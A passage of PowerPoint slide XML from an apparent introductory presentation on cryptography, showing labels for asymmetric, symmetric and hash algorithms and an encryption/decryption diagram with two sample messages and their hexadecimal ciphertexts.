          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>LOB Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Source Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Keys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6" name="Cryptography"/>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Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Asymmetric…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" marL="690033" indent="-232833" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8DACD0"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Asymmetric</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Symmetric</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One-way (Hash algorithm)</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1" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394026" y="1408853"/>
            <a:ext cx="1" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFCCFF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="650240">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="742" name="A:\j0251713.wmf" descr="A:\j0251713.wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4838417" y="975359"/>
            <a:ext cx="1013744" cy="1083735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="ENCRYPTION"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842346" y="1083733"/>
            <a:ext cx="4334934" cy="4983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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ENCRYPTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Message 2…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300479" y="4334933"/>
            <a:ext cx="4768428" cy="4270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400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Message 2</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>The Internet knows no geographical boundaries. It has redefined time and space.  Advances in computer and telecommunication technologies have led to the explosive growth of the Internet.  This in turn is affecting the methods of communication, work, study, education, interaction, leisure, health, governance, trade and commerce. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Encrypted Message 2</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="993300"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>a520eecb61a770f947ca856cd675463f1c95a9a2b8d4e6a71f80830c87f5715f5f59334978dd7e97da0707b48a1138d77ced56feba2b467c398683c7dbeb86b854f120606a7ae1ed934f5703672adab0d7be66dccde1a763c736cb9001d0731d541106f50bb7e54240c40ba780b7a553bea570b99c9ab3df13d75f8ccfdddeaaf3a749fd1411</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Message 1…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300479" y="1882986"/>
            <a:ext cx="4768428" cy="2111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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Message 1		</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Central to the growth of e-commerce and e-governance is the issue of trust in electronic environment.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Encrypted Message 1</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="993300"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>9a46894335be49f0b9cab28d755aaa9cd98571b275bbb0adb405e6931e856ca3e5e569edd135285482</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408853" y="4226559"/>
            <a:ext cx="4768428" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="B2B2B2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="650240">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="750" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="866986" y="2492586"/>
            <a:ext cx="433494" cy="1380677"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="433493" cy="1380676"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="747" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="13806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1" y="0"/>
                    <a:pt x="0" y="3454"/>
                    <a:pt x="0" y="7714"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15392"/>
                    <a:pt x="5770" y="18306"/>
                    <a:pt x="14400" y="19396"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14400" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="17633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="12784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="14987"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7890" y="14165"/>
                    <a:pt x="2873" y="12282"/>
                    <a:pt x="900" y="9918"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="9918"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="6649"/>
                    <a:pt x="12048" y="4408"/>
                    <a:pt x="21600" y="4408"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="993300"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="3333CC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="748" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="6339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1" y="0"/>
                    <a:pt x="0" y="7522"/>
                    <a:pt x="0" y="16800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18425"/>
                    <a:pt x="303" y="20042"/>
                    <a:pt x="900" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="14480"/>
                    <a:pt x="12048" y="9600"/>
                    <a:pt x="21600" y="9600"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="7A2900"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="749" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="493098"/>
              <a:ext cx="18070" cy="140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7315"/>
                    <a:pt x="7276" y="14590"/>
                    <a:pt x="21600" y="21600"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="754" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="650239" y="5418666"/>
            <a:ext cx="650241" cy="2548942"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="650240" cy="2548941"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="751" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="650241" cy="25489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1" y="0"/>
                    <a:pt x="0" y="3454"/>
                    <a:pt x="0" y="7714"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15392"/>
                    <a:pt x="5770" y="18306"/>
                    <a:pt x="14400" y="19396"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14400" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="17633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="12784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="14987"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7890" y="14165"/>
                    <a:pt x="2873" y="12282"/>
                    <a:pt x="900" y="9918"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="9918"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="6649"/>
                    <a:pt x="12048" y="4408"/>
                    <a:pt x="21600" y="4408"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="993300"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="3333CC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="752" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="650241" cy="11704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1" y="0"/>
                    <a:pt x="0" y="7522"/>
                    <a:pt x="0" y="16800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18425"/>
                    <a:pt x="303" y="20042"/>
                    <a:pt x="900" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="14480"/>
                    <a:pt x="12048" y="9600"/>
                    <a:pt x="21600" y="9600"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="7A2900"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="753" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="910336"/>
              <a:ext cx="27105" cy="260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7315"/>
                    <a:pt x="7276" y="14590"/>
                    <a:pt x="21600" y="21600"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="755" name="C:\Documents and Settings\compaq\Application Data\Microsoft\Media Catalog\Downloaded Clips\cl0\BS00996_.wmf" descr="C:\Documents and Settings\compaq\Application Data\Microsoft\Media Catalog\Downloaded Clips\cl0\BS00996_.wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2860604"/>
            <a:ext cx="559930" cy="390597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="756" name="C:\Documents and Settings\compaq\Application Data\Microsoft\Media Catalog\Downloaded Clips\cl0\BS00996_.wmf" descr="C:\Documents and Settings\compaq\Application Data\Microsoft\Media Catalog\Downloaded Clips\cl0\BS00996_.wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="433493" y="6328551"/>
            <a:ext cx="559930" cy="390596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="DECRYPTION"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694507" y="1083733"/>
            <a:ext cx="4334934" cy="4983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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="990033"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990033"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>DECRYPTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758" name="Encrypted Message 1…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477759" y="1842346"/>
            <a:ext cx="5201921" cy="2111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just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Encrypted Message 1</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="993300"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
